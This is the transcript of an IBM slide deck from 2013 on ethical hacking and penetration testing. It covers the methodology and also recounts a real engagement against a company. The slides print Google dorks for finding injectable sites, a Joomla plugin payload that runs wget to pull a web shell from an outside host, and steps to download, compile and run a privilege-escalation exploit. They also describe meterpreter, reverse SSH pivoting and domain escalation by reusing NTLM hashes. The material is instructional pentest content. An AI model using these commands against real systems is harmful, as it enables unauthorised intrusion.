Have a Smartphone? SCAN ME - GSE Young Professionals - Ethical Hacking and Pentesting.pdf · Have a...
Transcript of Have a Smartphone? SCAN ME - GSE Young Professionals - Ethical Hacking and Pentesting.pdf · Have a...
Ethical Hacking and Pentesting Vito Rallo, IBM Security Services Penetration Testing
Have a Smartphone? SCAN ME
©2013 IBM Corporation
Hackers and Ethical Hackers
The hacker manifesto: “Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.”
©2013 IBM Corporation
Having fun in Security § Ethical hackers enjoy the most exciting part of
Security?
Network Security
Data Security
Application Security
Mobile Security
Cloud Security
Availability
Compliancy
Management
TESTING
©2013 IBM Corporation
Penetration testing through the years § early pentesting was a black art § true penetration testing skills were learned
§ there was no semblance of a commonly-accepted methodology, every pentester used to write his own
§ In late 2000 open source security testing methodology the OSSTMM
§ Pentest widespread, tools and knowledge
§ IBM has done pentest since 1995
©2013 IBM Corporation
Outline of activities
§ The IBM penetration testing methodology includes:
– Project initiation – Reconnaissance – Discovery and assessment
– Perimeter or internal attack – Exploitation – Findings and analysis – Deliverables (report)
©2013 IBM Corporation
Today: the new pentesting
A good pentesting is made by PEOPLE not by TOOLS
It’s crucial understanding the process of an attack, not just the tools and the vulns but the actual mindset to use to break in
Pentest is not a project, it’s a PROCESS!
There is plenty of companies who will teach you “ethical hacking”, “applied pentesting”, books, tools and so on. None of them will give you the hacking mindset.
©2013 IBM Corporation
Client Values and Deliverables Penetration testing services can deliver:
An effective, affordable service that provides a “hacker’s-eye” view of a client’s security posture
©2013 IBM Corporation
What IBM can deliver
§ In-depth assessment of vulnerabilities only found through source code analysis
§ Map with regulations such as PCI, DISA, FISMA, and Sarbanes-Oxley, and best practices including the OWASP Top 10
Application Source Code Assessment
§ Functional review of the application from both a client and server perspective
§ Comprehensive vulnerability assessment of the application and network infrastructure directly supporting the application
§ Mobile Applications Assessment
Application and Mobile Security Assessment
Leverages IBM Rational® AppScan® software
Penetration testing
Assessment of application vulnerabilities Leverages IBM Rational®
AppScan® Source Edition
§ Coporate networks and local infrastructures (remote/onsite)
§ WebApplications (blackbox/graybox)
§ Mobile and Embedded device testing (e.g. iPhone, Android)
§ SCADA control systems for utility and power companies
§ Client Server Apps and Mobile apps
§ Reverse engineering and exploit development
©2013 IBM Corporation
DoS attacks categories § Network (L4 attacks)
– TCP/UDP/ICMP Floods
– Protocol Specific Weaknesses
§ Application (L7 attacks) – HTTP
– Slow Loris, R.U.D.Y, etc
– SSL
– DNS
©2013 IBM Corporation
DDoS Defence Strategy § Many providers/services à cloud service
– Scrub Services (clean pipe) – MSS and Carrier Cloud Netflow
§ Mostly based on: Anomalies Analysis/Signature based detection
§ Common patterns: In-premises mitigations, Out-premises mitigation
§ Pain points: decentralization of the internet § Ideally, block attacks closest the source
©2013 IBM Corporation
New generation remediation trends § Overlay Networks
– Large distributed nodes, reverse proxies, bleeding edge known mitigation services (AKAMAI)
12
Let’s get into the business Pentest in real life
©2013 IBM Corporation
Reconnaissance § DNS – Domain – IP à
who is § Social Networks § Corporate info and so
on… § Jobs ads.. !? K
./theHarvester.py -d xxx.be -l 500 -b google [-] Searching in Google:
Searching 500 results... [+] Emails found: ------------------ [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] …………..A LOT MORE [+] Hosts found in search engines: ------------------------------------ 1xx.244.74.x:www.xxx.be 1xx.244.x.200:ns.xxx.be 1xx.x.76.200:Ns.xxx.be x.245.3.200:ns2.xxx.be [-] Searching in Linkedin.. Users from Linkedin: ==================== Nico xxxff Nishantxxxxar - Singapore Systems analyst web Fraxx xxxens - Belgium Lucxxx xxxans Systems technology analyst xxx xxxeters Nishant xxxxxxr
©2013 IBM Corporation
Reconnaissance § Google hacking .. and Dorks
inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:"id=" & intext:"Warning: mysql_fetch_array() inurl:":2082/login/?user=" inurl:free.fr/index.php?id= inurl:reservation.php?id= inurl:promotion.php?id= inurl:carte.php?id= inurl:menu.php?id=
©2013 IBM Corporation
Shodan § Google for hackers
§ Search engine of indexed “banners”
©2013 IBM Corporation
Tons and tons of open devices
©2013 IBM Corporation
Vulnerability Discovery
Latest 5 years tendency
©2013 IBM Corporation
Keys issues in WebApp security
• SQL Injection • A definition:
“SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.”
• Cross Site Scripting • A definition:
“Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users.”
©2013 IBM Corporation
SQL injection in Login
©2013 IBM Corporation
Cross-Site Scripting – The Exploit Process
IBM Confidential
©2013 IBM Corporation
XSS, BeEF
§ Basically a client-exploitation Framework
©2013 IBM Corporation
Establish a toehold § The beginning of the end
– Compromise a server: force the webapp to upload a malicious file à how? Password discovered, phpinclude, phpupload, exploiting CMS vulns and so on…
– Now, think about privilege escalation up to root!
©2013 IBM Corporation
French company, call it “Carla” – Owns several brands
– Offer Intranet services
– Hosts website in internal DMZ § Black Box
– Pure offensive hacking, no whitelisting, event monitoring team
servers (web, ftp) DMZ172.20.10.x
one2one NAT/PAT
extranet.gammvert.fr
www.biotop.fr
www.invivo-group.com
84.x.x.z
84.x.x.y
84.x.x.x
©2013 IBM Corporation
Carla Critical vuln
§ Acajoom, plug in for Joomla (pass to exec)
http://X.X.33.4//components/com_acajoom/self.acajoom.php ?s=system('wget%20http://x.x.x.x/myp.php’)
©2013 IBM Corporation
Privileges Escalation Linux environment analysis (uname –a)
cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.3 (Tikanga)
cd /tmp wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c
gcc 36038-6.c -o nu ./nu
meterpreter > sysinfo Computer : XXXXwebServer OS : Linux XXXXwebServer 2.6.18-128.el5 #1 SMP Wed Dec 17 11:42:39 EST 2008 i686 Meterpreter : php/php
©2013 IBM Corporation
The final attack scenario
TUNNELL SSH
attacking server
Hacker, attacking station
biotopwebserver inVivo
DMZ172.20.10.x
ServerInfrastructure
(Windows and Linux
hosts)
vuln direct
exploitation
Cont
rol+
Sock
s vp
n
Reverse SSH
©2013 IBM Corporation
Inside the DMZ § We can now connect TCP to all the inner hosts on the private LAN, scan, discovery,
exploit again…
§ Touching services that are not available from outside the Firewall (firewall cannot catch me).
©2013 IBM Corporation
Windows Domain Escalation § Just a old unused server § Get in, compromise one § Get NTLM hash for Admin, try on other server..
– Administrators tends to use the same password for local admin accounts
§ Get another one, search for tokens… – Service in execution with Domain Admin rights
§ Escalation to the domain controller!
29
The new Unawareness Next years fun
©2013 IBM Corporation
Awareness and unawareness § Web App 5 years ago
– HTTP Based, GET, POST requests § Web App Today
– HTML, CSS, Dynamic, AJAX, RoR… – still some Flash, Java, Silverlight
§ Web App in 2 years
©2013 IBM Corporation
Web Apps in 2 years
©2013 IBM Corporation
Mobile Threat Model
Slide from OWASP
©2013 IBM Corporation
STRIDE Model for Mobile
Slide from OWASP
©2013 IBM Corporation
Testing Framework for apps and devices § Dynamic Analysis § Static Analysis
35
Final Considerations Security posture of your enterprise
©2013 IBM Corporation
Compliance is not total security § Scan, Checklists, Security Products.. Will offer you
total bullet-proof security solution?
©2013 IBM Corporation
The right attitude § Confused, Uncertainty, Fear, Unprepared, Proud,
Unclear…
©2013 IBM Corporation
Certainty
©2013 IBM Corporation
Uncertainty § Create Security Intelligence § Iterate Prevention->Monitor->Response to
dynamically improve the security model
©2013 IBM Corporation
Emergency Response § Helps the customer under emergency contingency:
• Analysis of computer security incident data to determine the source of the incident, its cause, and its effects;
• Assist in preventing the effects of the computer security incident from spreading to other computer systems and networks;
• Assist with stopping the computer security incident at its source and/or protecting Customer’s computer systems and networks from the effects of the computer security incident;
• Recommendations for restoration of the affected computer systems and networks to normal operations; and
• Suggesting protection methods for Customer’s computer systems and networks from future similar occurrences
§ Incidents Response; Containment and Remediation (Forensic analysis), Prevention
§ Who they are: high skilled security people, forensics experts, certified analysts and ex-military